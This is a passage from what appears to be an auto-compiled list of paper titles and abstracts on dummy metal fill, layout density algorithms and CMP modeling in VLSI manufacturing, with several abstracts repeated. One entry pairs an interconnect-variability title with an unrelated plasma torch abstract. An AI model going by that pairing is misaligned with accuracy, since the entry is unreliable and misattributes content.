as normal electrodes in capacitance extraction, the proposed method is much more efficient than the conventional method, especially in cases with a large number of floating dummies. --- paper_title: A DOE Set for Normalization-Based Extraction of Fill Impact on Capacitances paper_content: Metal fills, which are used to reduce metal thickness variations due to chemical-mechanical polishing (CMP), increase the capacitances in a circuit. Although current extraction tools are accurate in handling grounded fills and regular interconnects, for floating fills, these tools are based on certain approximations, such as assuming that floating fills are grounded or each fill is merged with neighboring ones. To reduce such inaccuracies, the authors provide a design of experiments (DOE), which will be used in addition to what is available in the extraction tools for regular interconnects. Through the proposed DOE set, a design or mask house can generate normalized fill tables to remove the inaccuracies of the extraction tools in the presence of floating fills. The capacitance values are updated using these normalized fill tables. The proposed DOE enables extensive analyses of the fill impacts on coupling capacitances. The authors show through extensive 3D field solver simulations that the assumptions used in extractors result in significant inaccuracies. The authors present analyses of fill impacts for an example technology, and also provide analyses using the normalized fill tables to be used in the extraction flow for three different standard fill algorithms --- paper_title: Efficient capacitance extraction method for interconnects with dummy fills paper_content: The accuracy of parasitic extraction has become increasingly important for system-on-chip (SoC) designs. In this paper, we present a practical method of dealing with the influences of floating dummy metal fills, which are inserted to assist planarization by the chemical-mechanical polishing (CMP) process, in extracting interconnect capacitances. The method is based on reducing the thicknesses of dummy metal layers according to electrical field theory. We also clarify the influences of dummy metal fills on the parasitic capacitance, signal delay, and crosstalk noise. Moreover, we address that the existence of the interlayer dummy metal fills has more significant influences than the intralayer dummies in terms of the impact on coupling capacitances. When dummy metal fills are ignored, the error of capacitance extraction can be more than 30%, whereas the error of the proposed method is less than about 10% for many practical geometries. We also demonstrate, by comparison with capacitance results measured for a 90-nm test chip, that the error of the proposed method is less than 8%. --- paper_title: Variability-driven considerations in the design of integrated-circuit global interconnects paper_content: A torch with a turbulized supply of a plasma forming gas comprises an electrode having a high-melting insert and a flat end face, and a nozzle with an internal surface having two mated portions: one cylindrical and one tapering; and the diameter of the electrode flat end face amounts essentially to 0.4-0.5 diameter of the electrode proper and the radius of conjugation of the nozzle cylindrical and tapering portions is equal essentially to the length of its cylindrical portion. Due to such a design, the inventive torch features a long service life of both the electrode and the nozzle. --- paper_title: Simultaneous buffer insertion and wire sizing considering systematic CMP variation and random leff variation paper_content: Abstract—This paper presents extensions of the dynamicprogramming (DP) framework to consider buffer insertion and wire-sizing under effects of process variation. We study the effectiveness of this approach to reduce timing impact caused by chemical–mechanical planarization (CMP)-induced systematic variation and random Leff process variation in devices. We first present a quantitative study on the impact of CMP to interconnect parasitics. We then introduce a simple extension to handle CMP effects in the buffer insertion and wire sizing problem by simultaneously considering fill insertion (SBWF).We also tackle the same problem but with random Leff process variation (vSBWF) by incorporating statistical timing into the DP framework. We develop an efficient yet accurate heuristic pruning rule to approximate the computationally expensive statistical problem. Experiments under conservative assumption on process variation show that SBWF algorithm obtains 1.6% timing improvement over the variationunaware solution. Moreover, our statistical vSBWF algorithm results in 43.1% yield improvement on average. We also show that our approaches have polynomial time complexity with respect to the net-size. The proposed extensions on the DP framework is orthogonal to other power/area-constrained problems under the same framework, which has been extensively studied in the literature. --- paper_title: The Emerging JBIG2 Standard paper_content: The Joint Bi-Level Image Experts Group (JBIG), an international study group affiliated with ISO/IEC and ITU-T, is in the process of drafting a new standard for lossy and lossless compression of bilevel images. The new standard, informally referred to as JBIG2, will support model-based coding for text and halftones to permit compression ratios up to three times those of existing standards for lossless compression. JBIG2 will also permit lossy preprocessing without specifying how it is to be done, In this case, compression ratios up to eight times those of existing standards may be obtained with imperceptible loss of quality. It is expected that JBIG2 will become an international standard by 2000. --- paper_title: Compressible area fill synthesis paper_content: Control of variability and performance in the back end of the VLSI manufacturing line has become extremely difficult with the introduction of new materials such as copper and low-k dielectrics. To improve manufacturability, and in particular to enable more uniform chemical-mechanical planarization (CMP), it is necessary to insert area fill features into low-density layout regions. Because area fill feature sizes are very small compared to the large empty layout areas that need to be filled, the filling process can increase the size of the resulting layout data file by an order of magnitude or more. To reduce file transfer times, and to accommodate future maskless lithography regimes, data compression becomes a significant requirement for fill synthesis. In this paper, we make the following contributions. First, we define two complementary strategies for fill data volume reduction corresponding to two different points in the design-to-manufacturing flow: compressible filling and post-fill compression . Second, we compare compressible filling methods in the fixed-dissection regime when two different sets of compression operators are used: the traditional GDSII array reference (AREF) construct, and the new Open Artwork System Interchange Standard (OASIS) repetitions. We apply greedy techniques to find practical compressible filling solutions and compare them with optimal integer linear programming solutions. Third, for the post-fill data compression problem, we propose two greedy heuristics, an exhaustive search-based method, and a smart spatial regularity search technique. We utilize an optimal bipartite matching algorithm to apply OASIS repetition operators to irregular fill patterns. Our experimental results indicate that both fill data compression methodologies can achieve significant data compression ratios, and that they outperform industry tools such as Calibre V8.8 from Mentor Graphics. Our experiments also highlight the advantages of the new OASIS compression operators over the GDSII AREF construct. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps &mdash notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP)&mdash have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features to a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process. --- paper_title: Filling algorithms and analyses for layout density control paper_content: In very deep-submicron very large scale integration (VLSI), manufacturing steps involving chemical-mechanical polishing (CMP) have varying effects on device and interconnect features, depending on local characteristics of the layout. To reduce manufacturing variation due to CMP and to improve performance predictability and yield, the layout must be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. To date, only foundries and special mask data processing tools perform layout post-processing for density control. In the future, better convergence of performance verification flows will depend on such layout manipulations being embedded within the layout synthesis (place-and-route) flow. In this paper, we give the first realistic formulation of the filling problem that arises in layout optimization for manufacturability. Our formulation seeks to add features to a given process layer, such that (1) feature area densities satisfy prescribed upper and lower bounds in all windows of given size and (2) the maximum variation of such densities over all possible window positions in the layout is minimized. We present efficient algorithms for density analysis, notably a multilevel approach that affords user-tunable accuracy. We also develop exact solutions to the problem of fill synthesis, based on a linear programming approach. These include a linear programming (LP) formulation for the fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout) and an LP formulation that is automatically generated by our multilevel density analysis. We briefly review criteria for fill pattern synthesis, and the paper then concludes with computational results and directions for future research. --- paper_title: Is your layout density verification exact?: a fast exact algorithm for density calculation paper_content: As the device shapes keep shrinking, the designs are more sensitive to manufacturing processes. In order to improve performance predictability and yield, mask layout uniformity/evenness is highly desired, and it is usually measured by the feature density with defined feasible range in manufacture process design rules. To address the density control problem, one fundamental problem is how to calculate density accurately and efficiently. In this paper, we propose a fast exact algorithm to identify the maximum density for a given layout. Compared with the existing exact algorithms, our algorithm reduces the running time from days/hours to a few minutes/seconds. And it is even faster than the existing approximate algorithms in literature. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps &mdash notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP)&mdash have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features to a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process. --- paper_title: Comments on "Filling algorithms and analyses for layout density control" paper_content: Theorem 2 of the title paper (A.B. Kahng et al., ibid. vol. 18, pp.445-462, 1999) presents layout density bounds for any fixed r-dissection w-by-w window given the layout density of at least L and at most U for all w-by-w windows whose bottom left corners are at points (i(w/r), j(w/r)), i, j=0, 1, ..., r((n/w)-1) on an n-by-n layout plane. However, the bounds are not tight for certain combinations of U (L) and r. Here, the authors present an approach to obtaining the tight lower and upper bounds for all possible combinations of U (L) and r. --- paper_title: New and exact filling algorithms for layout density control paper_content: To reduce manufacturing variation due to chemical-mechanical polishing and to improve yield, layout must be made uniform with respect to density criteria. This is achieved by layout postprocessing to add fill geometries, either at the foundry or, for better convergence of performance verification flows, during layout synthesis. This paper proposes a new min-variation objective for the synthesis of fill geometries. Within the so-called fixed dissection regime (where density bounds are imposed on a predetermined set of windows in the layout), we exactly solve the min-variation objective using a linear programming formulation. We also state criteria for fill pattern synthesis, and discuss additional criteria that apply when fill, must be grounded for predictability of circuit performance. We believe that density control for CMP will become an important research topic in the VLSI design-manufacturing interface over the next several years. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps &mdash notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP)&mdash have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features to a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process. --- paper_title: New multilevel and hierarchical algorithms for layout density control paper_content: Certain manufacturing steps in very deep submicron VLSI involve chemical-mechanical polishing (CIMP) which has varying effects on device and interconnect features, depending on local layout characteristics. To reduce manufacturing variation due to CMP and to improve yield and performance predictability, the layout needs to be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. This paper presents an efficient multilevel approach to density analysis that affords user-tunable accuracy. We also develop exact fill synthesis solutions based on combining multilevel analysis with a linear programming approach. Our methods apply to both flat and hierarchical designs. --- paper_title: Nanotopography Issues in Shallow Trench Isolation CMP paper_content: As advancing technologies increase the demand for planarity in integrated circuits, nanotopography has emerged as an important concern in shallow trench isolation (STI) on wafers polished by means of chemical-mechanical planarization (CMP). Previous work has shown that nanotopography-small surface-height variations of 10-100 nm in amplitude extending across millimeter-scale lateral distances on virgin wafers-can result in CMP-induced localized thinning of surface films such as the oxides or nitrides used in STI. A contact-wear CMP model can be employed to produce maps of regions on a given starting wafer that are prone to particular STI failures, such as the lack of complete clearing of the oxide in low spots and excessive erosion of nitride layers in high spots on the wafer. Stiffer CMP pads result in increased nitride thinning. A chip-scale pattern-dependent CMP simulation shows that substantial additional dishing and erosion occur because of the overpolishing time required due to nanotopography. Projections indicate that nanotopography height specifications will likely need to decrease in order to scale with smaller feature sizes in future IC technologies. --- paper_title: New and exact filling algorithms for layout density control paper_content: To reduce manufacturing variation due to chemical-mechanical polishing and to improve yield, layout must be made uniform with respect to density criteria. This is achieved by layout postprocessing to add fill geometries, either at the foundry or, for better convergence of performance verification flows, during layout synthesis. This paper proposes a new min-variation objective for the synthesis of fill geometries. Within the so-called fixed dissection regime (where density bounds are imposed on a predetermined set of windows in the layout), we exactly solve the min-variation objective using a linear programming formulation. We also state criteria for fill pattern synthesis, and discuss additional criteria that apply when fill, must be grounded for predictability of circuit performance. We believe that density control for CMP will become an important research topic in the VLSI design-manufacturing interface over the next several years. --- paper_title: Computational Geometry: An Introduction paper_content: From the reviews: "This book offers a coherent treatment, at the graduate textbook level, of the field that has come to be known in the last decade or so as computational geometry...The book is well organized and lucidly written; a timely contribution by two founders of the field. It clearly demonstrates that computational geometry in the plane is now a fairly well-understood branch of computer science and mathematics. It also points the way to the solution of the more challenging problems in dimensions higher than two." --- paper_title: Dummy Feature Placement for Oxide Chemical-mechanical PolishingManufacturability paper_content: CChemical-mechanical polishing (CMP) is a technique used in very deep-submicron VLSI manufacturing to achieve uniformity in long range oxide planarization. Post-CNIP topography is highly related to local spatial pattern density in layout. To change local pattern density, and thus ensure post-CMP planarization, dummy features are placed in layout. The only known previously published algorithm for dummy feature placement is based oil a very simple and inadequate model. This paper is based on a closed-form analytical model for inter-level dielectric thickness in CMP process by B. Stine et al. and a model for effective local layout pattern density by D. Ouma et al. Those two models accurately describe the relation between local pattern density and post-CMP planarization. This paper uses those two models to solve the dummy feature placement problem of a single layer in the fixed-dissection regime. An experiment, conducted with real industry design data, gives excellent results by reducing post-CMP topography variation from 753A to 169A. --- paper_title: Filling algorithms and analyses for layout density control paper_content: In very deep-submicron very large scale integration (VLSI), manufacturing steps involving chemical-mechanical polishing (CMP) have varying effects on device and interconnect features, depending on local characteristics of the layout. To reduce manufacturing variation due to CMP and to improve performance predictability and yield, the layout must be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. To date, only foundries and special mask data processing tools perform layout post-processing for density control. In the future, better convergence of performance verification flows will depend on such layout manipulations being embedded within the layout synthesis (place-and-route) flow. In this paper, we give the first realistic formulation of the filling problem that arises in layout optimization for manufacturability. Our formulation seeks to add features to a given process layer, such that (1) feature area densities satisfy prescribed upper and lower bounds in all windows of given size and (2) the maximum variation of such densities over all possible window positions in the layout is minimized. We present efficient algorithms for density analysis, notably a multilevel approach that affords user-tunable accuracy. We also develop exact solutions to the problem of fill synthesis, based on a linear programming approach. These include a linear programming (LP) formulation for the fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout) and an LP formulation that is automatically generated by our multilevel density analysis. We briefly review criteria for fill pattern synthesis, and the paper then concludes with computational results and directions for future research. --- paper_title: Monte-Carlo algorithms for layout density control paper_content: Chemical-mechanical polishing (CMP) and other manufacturing steps in very deep submicron VLSI have varying effects on device and interconnect features, depending on local characteristics of the layout. To enhance manufacturability and performance predictability, we seek to make the layout uniform with respect to prescribed density criteria, by inserting "fill" geometries into the layout. We propose several new Monte-Carlo based filling methods with fast dynamic data structures and report the tradeoff between runtime and accuracy for the suggested methods. Compared to existing linear programming based approaches, our Monte-Carlo methods seem very promising as they produce nearly-optimal solutions within reasonable runtimes. --- paper_title: Practical iterated fill synthesis for CMP uniformity paper_content: We propose practical iterated methods for layout density control for CMP uniformity, based on linear programming, Monte-Carlo and greedy algorithms. We experimentally study the tradeoffs between two main filling objectives: minimizing density variation, and minimizing the total amount of inserted fill. Comparisons with previous filling methods show the advantages of our new iterated Monte-Carlo and iterated greedy methods. We achieve near-optimal filling with respect to each of the objectives and for both density models ( spatial density [3] and effective density [8]). Our new methods are more efficient in practice than linear programming [3] and more accurate than non-iterated Monte-Carlo approaches [1]. --- paper_title: Hierarchical dummy fill for process uniformity paper_content: To improve manufacturability and performance predictability, we seek to make a layout uniform with respect to prescribed density criteria, by inserting "fill" geometries into the layout. Previous approaches for flat layout density control are not scalable due to the necessity of solving very large linear programs, the large data volume of the solution, and the impact of hierarchy-breaking on verification. In this paper, we give the first methods for hierarchical layout density control for process uniformity. Our approach trades off naturally between runtime, solution quality, and output data volume. We also allow generation of compressed GDSII of fill geometries. Our experiments show that this hybrid hierarchical filling approach saves data volume and is scalable, while yielding solution quality that is competitive with existing Monte-Carlo and linear programming based approaches. --- paper_title: Performance-impact limited area fill synthesis paper_content: Chemical-mechanical planarization (CMP) and other manufacturing steps in every deep-submicron VLSI have varying effects on device and interconnect features, depending on the local density. To improve manufacturability and performance predictability, area fill features are inserted into the layout to improve uniformity with respect to density criteria. However, the performance impact of area fill insertion is not considered by any fill method in the literature. In this paper, we first review and develop estimates for capacitance and timing overhead of area fill insertions. We then give the first formulations of the Performance Impact Limited Fill (PIL-Fill) problem with the objective of either minimizing total delay impact (MDFC) or maximizing the minimum slack of all nets (MSFC), subject to inserting a given prescribed amount of fill. For the MDFC PIL-Fill problem, we describe three practical solution approaches based on Integer Linear Programming (ILP-I and ILP-II) and the Greedy method. For the MSFC PIL-Fill problem, we describe an iterated greedy method that integrates call to an industry static timing analysis tool. We test our methods on layout testcases obtained from industry. Compared with the normal fill method according to Y. Chen et al.(2002), our ILP-II method for MDFC PIL-Fill problem achieves between 25% and 90% reduction in terms of total weighted edge delay (roughly, a measure of sum of node slacks) impact while maintaining ideal quality of the layout density control and our iterated greedy method for MSFC PIL-II problem also shows significant advantage with respect to the minimum slack of nets on post-fill layout. --- paper_title: Dummy fill density analysis with coupling constraints paper_content: In modern VLSI manufacturing processes, dummy fills are widely used to adjust local metal density in order to improve layout uniformity and yield optimization. However, the introduction of a large amount of dummy features also affects wire electrical properties. In this paper, we propose the first Coupling constrained Dummy Fill (CDF) analysis algorithm which identifies feasible locations for dummy fills such that the fill induced coupling capacitance can be bounded within the given coupling threshold of each wire segment. The algorithm also makes efforts to maximize ground dummy fills, which are more robust and predictable. The output of the algorithm can be treated as the upper bound for dummy fill insertion, and it can be easily adopted in density models to guide dummy fill insertion without disturbing the existing design. --- paper_title: Energy-Minimization Model for Fill Synthesis paper_content: Although fill allocation methods to enable reduced metal height variations and manually applicable design guidelines to reduce coupling capacitances are available, the synthesis of fills according to these allocations or guidelines is not well automated. Current fill insertion algorithms mostly use simple mask operations, which fail to enable the implementation of complex design guidelines. The proposed fill synthesis model not only enables implementation of such guidelines, but is also suitable for insertion of standard fill patterns. The proposed novel model has an intricate analogy to the electrons filling the orbits of an atom. Through the proposed method, the task of designing an optimal fill configuration is carried to the CAD tool designer in terms of designing a suitable energy network or rules, albeit in an easier way through provided insights and models --- paper_title: SPIDER: simultaneous post-layout IR-drop and metal density enhancement with redundant fill paper_content: This paper presents SPIDER, a novel methodology that advantageously utilizes metal fill to simultaneously fulfil metal density requirements and reduce IR-drop of the power distribution network. This is achieved through the addition of partially redundant connections between metal fills and power meshes. Our technique is especially significant for 90nm process technology or below because (1) metal fill must now be done as part of the IC implementation flow due to its increasing impact on timing, (2) the tolerance for IR drop is tightening due to voltage scaling, and the increasingly conservative power mesh design to address IR-drop is adding significant burden on the available routing resources, (3) IR-drop is getting worse due to increasing design sizes, and (4) the large degree of design uncertainty demands IRdrop repair capabilities that can be applied after routing is completed. SPIDER addresses all these issues practically with little or no cost. Experimental results further demonstrated the robustness and effectiveness of our approach: SPIDER achieves an average IR-drop reduction of 62.2% in 16 designs of various sizes. --- paper_title: Fill for shallow trench isolation CMP paper_content: Shallow trench isolation (STI) is the mainstream CMOS isolation technology. It uses chemical mechanical polishing (CMP) to remove excess of deposited oxide and attain a planar surface for successive process steps. Despite advances in STI CMP technology, pattern dependencies cause large post-CMP topography variation that can result in functional and parametric yield loss. Fill insertion is used to reduce pattern variation and consequently decrease post-CMP topography variation. Traditional fill insertion is rulebased and is used with reverse etchback to attain desired planarization quality. Due to extra costs associated with reverse etchback, "single-step" STI CMP in which fill insertion suffices is desirable. To alleviate the failures caused by imperfect CMP, we focus on two objectives for fill insertion: oxide density variation minimization and nitride density maximization. A linear programming based optimization is used to calculate oxide densities that minimize oxide density variation. Next a fill insertion methodology is presented that attains the calculated oxide density while maximizing the nitride density. Averaged over the two large testcases, the oxide density variation is reduced by 63% and minimum nitride density increased by 79% compared to tiling-based fill insertion. To assess post-CMP planarization, we run CMP simulation on the layout filled with our approach and find the planarization window (time window in which polishing can be stopped) to increase by 17% and maximum final step height (maximum difference in post-CMP oxide thickness) to decrease by 9%. --- paper_title: Modeling of chemical mechanical polishing for shallow trench isolation paper_content: Chemical mechanical polishing (CMP) is a key process enabling shallow trench isolation (STI), which is used in current integrated circuit manufacturing processes to achieve device isolation. Excessive dishing and erosion in STI CMP processes, however, create device yield concerns. This thesis proposes characterization and modeling techniques to address a variety of concerns in STI CMP. Three major contributions of this work are: characterization and modeling of STI CMP processes, both conventional and nonconventional; layout optimization to reduce pattern-dependent dishing and erosion; and modeling of wafer nanotopography impact on STI CMP yield. An STI CMP characterization method is combined with a chip-scale pattern-dependent model to create a methodology that enables tuning of STI CMP process models and prediction of post-CMP dishing, erosion, and clearing times on arbitrary layouts. Model extensions enable characterization of STI CMP processes that use nonconventional consumable sets, including fixed abrasive pads and high-selectivity silica-based and ceria-based slurries. Experimental data validates the accuracy of the model for both conventional and nonconventional processes. Layout optimization techniques are developed that reduce pattern-density dependent dishing and erosion. Layout design modification is achieved through the use of dummy STI active areas and selective reverse etchback structures. Smart algorithms allow for optimal density distributions across the layout. The effect of wafer nanotopography (height variations that exist on unpatterned silicon wafers) is explored, characterized, and modelled. A diagnostic tool for examining the impact of nanotopography on STI device yields is developed, based on contact wear modeling. An aggregate estimator for the combined effect of wafer-scale nanotopography and chip-scale pattern-dependent dishing and erosion is developed. The techniques developed in this thesis can be used both for process optimization and for diagnosis and correction of potential problems due to layout, wafer and CMP process interaction. The characterization and modeling methods create a comprehensive set of tools for process characterization and post-CMP erosion and dishing prediction in STI processes. Thesis Supervisor: Duane S. Boning Title: Associate Professor of Electrical Engineering and Computer Science --- paper_title: Fill for shallow trench isolation CMP paper_content: Shallow trench isolation (STI) is the mainstream CMOS isolation technology. It uses chemical mechanical polishing (CMP) to remove excess of deposited oxide and attain a planar surface for successive process steps. Despite advances in STI CMP technology, pattern dependencies cause large post-CMP topography variation that can result in functional and parametric yield loss. Fill insertion is used to reduce pattern variation and consequently decrease post-CMP topography variation. Traditional fill insertion is rulebased and is used with reverse etchback to attain desired planarization quality. Due to extra costs associated with reverse etchback, "single-step" STI CMP in which fill insertion suffices is desirable. To alleviate the failures caused by imperfect CMP, we focus on two objectives for fill insertion: oxide density variation minimization and nitride density maximization. A linear programming based optimization is used to calculate oxide densities that minimize oxide density variation. Next a fill insertion methodology is presented that attains the calculated oxide density while maximizing the nitride density. Averaged over the two large testcases, the oxide density variation is reduced by 63% and minimum nitride density increased by 79% compared to tiling-based fill insertion. To assess post-CMP planarization, we run CMP simulation on the layout filled with our approach and find the planarization window (time window in which polishing can be stopped) to increase by 17% and maximum final step height (maximum difference in post-CMP oxide thickness) to decrease by 9%. --- paper_title: Characterizing STI CMP Processes with an STI Test Mask Having Realistic Geometric Shapes paper_content: Chemical mechanical polishing (CMP) has become the enabling planarization method for shallow trench isolation (STI) of sub 0.25µm technology. CMP is able to reduce topography over longer lateral distances than earlier techniques; however, CMP still suffers from pattern dependencies that result in large variation in the post-polish profile across a chip. In the STI process, insufficient polish will leave residue nitride and cause device failure, while excess dishing and erosion degrade device performance. Our group has proposed several chip-scale CMP pattern density models [1], and a methodology using designed dielectric CMP test mask to characterize CMP processes [2]. The methodology has proven helpful in understanding STI CMP; however, it has several limitations as the existing test mask primarily consists of arrays of lines and spaces of large feature size varying from 10 to 100 µm. In this paper, we present a new STI characterization mask, which consists of various rectangular, L-shape, and X-shape structures of feature sizes down to submicron. The mask is designed to study advanced STI CMP processes better, as it is more representative of real STI structures. The small feature size amplifies the effects of edge acceleration and oxide deposition bias, and thus enables us to study their impact better. Experimental data from an STI CMP process is shown to verify the methodology, and these secondary effects are explored. The new mask and data guide ongoing development of improved pattern dependent STI CMP models. --- paper_title: Nanotopography Issues in Shallow Trench Isolation CMP paper_content: As advancing technologies increase the demand for planarity in integrated circuits, nanotopography has emerged as an important concern in shallow trench isolation (STI) on wafers polished by means of chemical-mechanical planarization (CMP). Previous work has shown that nanotopography-small surface-height variations of 10-100 nm in amplitude extending across millimeter-scale lateral distances on virgin wafers-can result in CMP-induced localized thinning of surface films such as the oxides or nitrides used in STI. A contact-wear CMP model can be employed to produce maps of regions on a given starting wafer that are prone to particular STI failures, such as the lack of complete clearing of the oxide in low spots and excessive erosion of nitride layers in high spots on the wafer. Stiffer CMP pads result in increased nitride thinning. A chip-scale pattern-dependent CMP simulation shows that substantial additional dishing and erosion occur because of the overpolishing time required due to nanotopography. Projections indicate that nanotopography height specifications will likely need to decrease in order to scale with smaller feature sizes in future IC technologies. --- paper_title: Planarization And Integration Of Shallow Trench Isolation paper_content: STI process flow and planarization requirements are reviewed. An STI planarization mask was designed and utilized for test wafer patterning to investigate STI CMP planarization. Test wafers were processed through a typical STI process sequence, including trench etch, trench liner oxidation, trench-fill, and CMP. Two different CVD techniques, ozone TEOS thermal CVD and HDPCVD, were investigated for trench-fill. CMP experiments were carried out with different process parameters and consumables. Extensive CMP characterization was carried out utilizing multiple metrology techniques. The results fit the previously reported “CMP dielectric planarization” model [1, 2] quite well. --- paper_title: New and exact filling algorithms for layout density control paper_content: To reduce manufacturing variation due to chemical-mechanical polishing and to improve yield, layout must be made uniform with respect to density criteria. This is achieved by layout postprocessing to add fill geometries, either at the foundry or, for better convergence of performance verification flows, during layout synthesis. This paper proposes a new min-variation objective for the synthesis of fill geometries. Within the so-called fixed dissection regime (where density bounds are imposed on a predetermined set of windows in the layout), we exactly solve the min-variation objective using a linear programming formulation. We also state criteria for fill pattern synthesis, and discuss additional criteria that apply when fill, must be grounded for predictability of circuit performance. We believe that density control for CMP will become an important research topic in the VLSI design-manufacturing interface over the next several years. --- paper_title: Fill for shallow trench isolation CMP paper_content: Shallow trench isolation (STI) is the mainstream CMOS isolation technology. It uses chemical mechanical polishing (CMP) to remove excess of deposited oxide and attain a planar surface for successive process steps. Despite advances in STI CMP technology, pattern dependencies cause large post-CMP topography variation that can result in functional and parametric yield loss. Fill insertion is used to reduce pattern variation and consequently decrease post-CMP topography variation. Traditional fill insertion is rulebased and is used with reverse etchback to attain desired planarization quality. Due to extra costs associated with reverse etchback, "single-step" STI CMP in which fill insertion suffices is desirable. To alleviate the failures caused by imperfect CMP, we focus on two objectives for fill insertion: oxide density variation minimization and nitride density maximization. A linear programming based optimization is used to calculate oxide densities that minimize oxide density variation. Next a fill insertion methodology is presented that attains the calculated oxide density while maximizing the nitride density. Averaged over the two large testcases, the oxide density variation is reduced by 63% and minimum nitride density increased by 79% compared to tiling-based fill insertion. To assess post-CMP planarization, we run CMP simulation on the layout filled with our approach and find the planarization window (time window in which polishing can be stopped) to increase by 17% and maximum final step height (maximum difference in post-CMP oxide thickness) to decrease by 9%. --- paper_title: Filling algorithms and analyses for layout density control paper_content: In very deep-submicron very large scale integration (VLSI), manufacturing steps involving chemical-mechanical polishing (CMP) have varying effects on device and interconnect features, depending on local characteristics of the layout. To reduce manufacturing variation due to CMP and to improve performance predictability and yield, the layout must be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. To date, only foundries and special mask data processing tools perform layout post-processing for density control. In the future, better convergence of performance verification flows will depend on such layout manipulations being embedded within the layout synthesis (place-and-route) flow. In this paper, we give the first realistic formulation of the filling problem that arises in layout optimization for manufacturability. Our formulation seeks to add features to a given process layer, such that (1) feature area densities satisfy prescribed upper and lower bounds in all windows of given size and (2) the maximum variation of such densities over all possible window positions in the layout is minimized. We present efficient algorithms for density analysis, notably a multilevel approach that affords user-tunable accuracy. We also develop exact solutions to the problem of fill synthesis, based on a linear programming approach. These include a linear programming (LP) formulation for the fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout) and an LP formulation that is automatically generated by our multilevel density analysis. We briefly review criteria for fill pattern synthesis, and the paper then concludes with computational results and directions for future research. --- paper_title: Dummy feature placement for chemical-mechanical polishing uniformity in a shallow trench isolation process paper_content: Manufacturability of a design that is processed with shallow trench isolation (STI) depends on the uniformity of the chemical-mechanical polishing (CMP) step in STI. The CMP step in STI is a dual-material polish, for which all previous studies on dummy feature placement for single-material polish [3, 11, 1] are not applicable. Based on recent semi-physical models of polish pad bending [5], local polish pad compression [2, 10], and different polish rates for materials present in a dual-material polish [2, 13], this paper derives a time-dependent relation between post-CMP topography and layout pattern density for CMP in STI. Using the dependencies derived, the first formulation of dummy feature placement for CMP in STI is given as a nonlinear programming problem. An iterative approach is proposed to solve the dummy feature placement problem. Computational experience on four layouts from Motorola is given. --- paper_title: A novel CBCM method free from charge injection induced errors: investigation into the impact of floating dummy-fills on interconnect capacitance paper_content: Starting from CIEF (charge injection induced errors) CBCM (charge-based capacitance measurement), a novel CBCM method free from the errors induced by charge-injection is developed. This is used for the first time to investigate the impact of floating dummy-fills on interconnect capacitance, in practice. The impact of floating dummy-fills is confirmed to play an important role on successful circuit design. Besides, a guideline to optimize the chip performance and minimize the crosstalk by dummy pattern design is also proposed in this paper. --- paper_title: Performance-impact limited area fill synthesis paper_content: Chemical-mechanical planarization (CMP) and other manufacturing steps in every deep-submicron VLSI have varying effects on device and interconnect features, depending on the local density. To improve manufacturability and performance predictability, area fill features are inserted into the layout to improve uniformity with respect to density criteria. However, the performance impact of area fill insertion is not considered by any fill method in the literature. In this paper, we first review and develop estimates for capacitance and timing overhead of area fill insertions. We then give the first formulations of the Performance Impact Limited Fill (PIL-Fill) problem with the objective of either minimizing total delay impact (MDFC) or maximizing the minimum slack of all nets (MSFC), subject to inserting a given prescribed amount of fill. For the MDFC PIL-Fill problem, we describe three practical solution approaches based on Integer Linear Programming (ILP-I and ILP-II) and the 